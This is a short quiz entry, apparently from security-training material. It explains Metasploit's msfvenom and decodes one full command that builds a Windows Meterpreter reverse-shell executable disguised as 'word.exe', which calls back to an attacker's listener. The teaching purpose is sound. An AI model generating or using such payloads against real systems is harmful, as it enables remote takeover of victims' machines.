LOGBOOK

HELP

Quiz Entry - updated: 2026.07.14

What is msfvenom, and what does a command like msfvenom -p windows/meterpreter/reverse_tcp -f exe LHOST=<ip> LPORT=444 -o word.exe produce?

msfvenom is Metasploit's payload generator — it builds a standalone malicious file (here a Windows .exe) that opens a reverse shell back to the attacker when run.

What it is:

msfvenom is the payload-and-encoder tool of the Metasploit Framework. It bakes a chosen payload (the code that runs on the victim) into a standalone artifact — an .exe, a script, raw shellcode, an APK, etc. — that can be delivered and executed outside an exploit. It's how the attacker turns "I want a reverse shell" into an actual file to hand the victim.

Decoding the command:

Flag Meaning
-p windows/meterpreter/reverse_tcp the payload: a Meterpreter agent that dials back out (reverse shell)
LHOST=<ip> / LPORT=444 the attacker's listener address/port the payload connects to
-f exe output format — a Windows executable
-o word.exe write it to this file (innocuously named)

So this one line produces word.exe: run it on a Windows box and it connects back to LHOST:LPORT, where the attacker's handler is waiting to open a session.

Why it matters: the LHOST/LPORT chosen here must match the listener (multi/handler) exactly — the payload and the catcher are two halves of the same reverse connection. msfvenom builds the half that runs on the victim; the handler is the half that runs on the attacker.

Tip: msfvenom = the venom you package up; msfconsole = where you sit and wait for it to bite.

Go deeper:

From Quiz: INTROL / Password Cracking | Updated: Jul 14, 2026